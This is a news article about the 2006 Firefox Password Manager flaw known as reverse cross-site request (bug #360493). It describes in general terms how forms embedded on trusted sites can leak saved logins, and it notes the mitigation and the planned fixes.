The Mozilla Foundation, which maintains code for the Firefox browser, has acknowledged that there is a problem with the Firefox Password Manager and has named it bug #360493. Microsoft has also admitted that the newly discovered password bug can affect Internet Explorer as well, but most reports indicate that Firefox is the more likely target because of the way it stores usernames and passwords.
Mozilla’s Firefox 2.0 has long been considered a safer Web browser than Microsoft’s Internet Explorer, but a new flaw in the Firefox Password Manager, which lets users store usernames and passwords for trusted Web sites, could let hackers steal their login data.
The problem, known as a reverse cross-site request, or RCSR, was first discovered by Robert Chapin, a Microsoft Certified Systems Engineer (MCSE) and I.T, consultant. The RCSR appears on blogs, message boards, or group forums that let users add comments with embedded HTML code.
On sites that allow users to enter code, a hacker can embed a form that tricks the user’s browser into sending its username and password information to the hacker’s computer. Because the form is embedded on a trusted Web site, the browser’s built-in antiphishing protection, which is designed to alert users to fraudulent Web sites, does not detect the problem.
Even worse, hackers can make the deceptive form invisible, meaning users can transmit their private data without even knowing it.
Bug #360493
The Mozilla Foundation, which maintains code for the Firefox browser, has acknowledged the problem and named it bug #360493. Microsoft has also admitted that RCSR attacks can affect Internet Explorer, but most reports indicate that Firefox is the more likely target because of the way it stores usernames and passwords.
Neither Mozilla nor Microsoft has released a patch for the problem, but users can avoid RCSR attacks simply by disabling their browsers’ autosave features for usernames and passwords. In Firefox, the feature is found in the “Options” window under the “Tools” menu.
Mozilla has indicated that it plans a fix in Firefox version 2.0.0.1 or 2.0.0.2.
Battle of the Titans
Most experts agree that Firefox is by and large the safer of the two major Web browsers, largely because Microsoft, on account of its size, draws more attention from hackers.
Indeed, the last two years have seen monthly and sometimes weekly reports of new bugs in Internet Explorer, letting hackers do everything from hijack a user’s computer to corrupt its private data.
But Microsoft released a new version of IE — version 7.0 — in October, and Mozilla quickly followed suit with version 2.0 of Firefox. Both versions boast enhanced security Relevant Products/Services, including antiphishing features that check Web sites against an online database of known frauds. And Internet Exporer 7 also offers much-requested improvements to the interface, such as tabbed browsing.
Random Programming Tips 
Leave a comment